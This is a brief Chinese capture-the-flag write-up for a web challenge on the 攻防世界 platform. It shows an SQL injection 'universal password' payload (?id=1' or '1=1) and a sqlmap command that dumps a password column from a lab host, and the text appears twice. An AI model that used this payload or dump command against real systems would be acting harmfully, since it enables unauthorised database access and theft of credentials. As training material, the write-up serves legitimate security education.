攻防世界-Web-inget
知识点
1.sql注入之万能密码
2.sqlmap使用
步骤
1.打开网站提示我们输入id去通过它。
万能密码
尝试数字型不可以,再试字符型拿到flag
?id=1' or '1=1
sqlmap
python sqlmap.py -u http://61.147.171.35:62869/index.php?id=1 -D cyber -T cyber -C pw --dump
1.sql注入之万能密码
2.sqlmap使用
1.打开网站提示我们输入id去通过它。
尝试数字型不可以,再试字符型拿到flag
?id=1' or '1=1
python sqlmap.py -u http://61.147.171.35:62869/index.php?id=1 -D cyber -T cyber -C pw --dump